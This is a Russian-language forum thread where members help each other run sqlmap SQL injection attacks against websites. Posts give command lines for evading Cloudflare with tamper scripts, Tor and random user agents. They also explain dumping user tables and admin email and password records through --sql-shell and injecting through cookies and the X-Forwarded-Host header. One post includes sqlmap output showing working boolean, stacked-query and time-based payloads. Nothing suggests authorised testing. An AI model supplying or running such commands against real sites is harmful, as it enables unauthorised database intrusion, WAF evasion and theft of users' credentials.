Вопросы по SQLmap и Havij оставляем только здесь Вопросы в других темах будут переноситься сюда или удаляться. Пожалуйста, не забывайте использовать тег [CODE]. Официально руководство: https://github.com/sqlmapproject/sqlmap/wiki/Usage
Очень актуальная тема для меня сейчас. Прошу помочь определится, в чем разница кроме интерфейса между sqlmap и sqli dumper?
vikler Member тебе поможет --help и изучи возможности https://github.com/sqlmapproject/sqlmap/tree/master/tamper в частности помогает вот этот скрипт частенько space2mssqlblank.py Code Hunter New Member sqlmap это швейцарский нож, думаю больше ничего аргументировать и не надо
First of all, you need to make sure the target site is protected by Cloudflare, you can add "--identify-waf" or "--check-waf" to confirm. However, do not set "--thread=" larger than 1 as the target will give you "403 Forbidden" error. Once you get the "403 error", your IP address is banned. Therefore, you are required to consider to use proxy servers or TOR to access the target. Secondary, you need to add "--tamper='between,randomcase,space2comment'" and "-v 3", if the target is confirmed being protected by Cloudflare. You may also consider to add "--random-agent" and "--tor" when necessary. Прежде всего, вы должны убедиться, что целевой сайт защищен Cloudflare, вы можете добавить "--identify-WAF" или "--check-WAF" для подтверждения. Не используй "--thread =" больше, 1 потока тк это даст вам "403 Forbidden" сообщение об ошибке. Как только вы получите "ошибку" 403, Ваш IP будет запрещен. Таким образом, вы должны рассмотреть возможность использования прокси-серверов или TOR для доступа к цели. Второе что, вам нужно добавить "--tamper = 'between,randomcase,space2comment'" и "-v 3", в принципе этого будет достаточно чтобы cloudflare отьебался. Вы также можете рассмотреть вариант с добавлением "--random-агент" и "--tor", когда это необходимо.
Есть еще вопрос, как допустим сдампить правильно сдампить таблицу с определенного столбца, допустим в бд 10000юзеров, мне нужно с 5000 начать дампить, как это сделать? и еще, как сдампить конкретно админов по группам.
--start=5000 --sql-shell далее пишем запрос как при обычной выборке SELECT mail,pass,etc FROM base.table WHERE условие критерия админа Админы прикрепите пожалуйста официальное руководство в тему вверху,то одни и те же вопросы. https://github.com/sqlmapproject/sqlmap/wiki/Usage
Подскажите перепробовал уже тьму вариантов, как можно нормально вытащить таблички и колонки (не перебирая по списку) Spoiler: Открыть/закрыть Code: sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables [00:48:09] [INFO] resuming back-end DBMS 'mysql' [00:48:09] [INFO] testing connection to the target URL [00:48:09] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session: --- Parameter: X-Forwarded-Host #1* ((custom) HEADER) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: -3650') OR 8491=8491 AND ('uAYR'='uAYR Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: ');(SELECT * FROM (SELECT(SLEEP(5)))WjQQ)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: ') AND (SELECT * FROM (SELECT(SLEEP(5)))hXGz) AND ('hNrS'='hNrS --- back-end DBMS: MySQL >= 5.0.0 banner: '5.6.19-log' [00:48:20] [ERROR] unable to retrieve the table names for any database do you want to use common table existence check? [y/N/q] Перебирая не находит то что нужно( бд по букве хоть но вывел а так: [ERROR] unable to retrieve the table names for any database
Попробуйте варианты sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables --technique=B --hex -v3 --is-dba sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables --technique=B --no-cast -v3 посмотреть причину ошибки по логу или возможно, нет прав
Господа хорошие, подскажите пожалуйста. Пытаюсь крутить скулю через cookie (именно подсавлять в куке), но нахожу статьи только как авторизоваться. Ошибка что выдает говорит мне - идиот, я же в get ищу, а что искать? И правильно ли я формирую запрос (http)? Спасибо.
попробуйте убрать -p "login" и в куках которые вы указали после значения логина добавить символ * должно получиться чтото вроде --cookie="login=mylogin*"
Можно ли sqlmap сканнировать такой запрос: sqlmap.py -u "site.ru/add/%27" Или какой софт сканерует такой запрос ?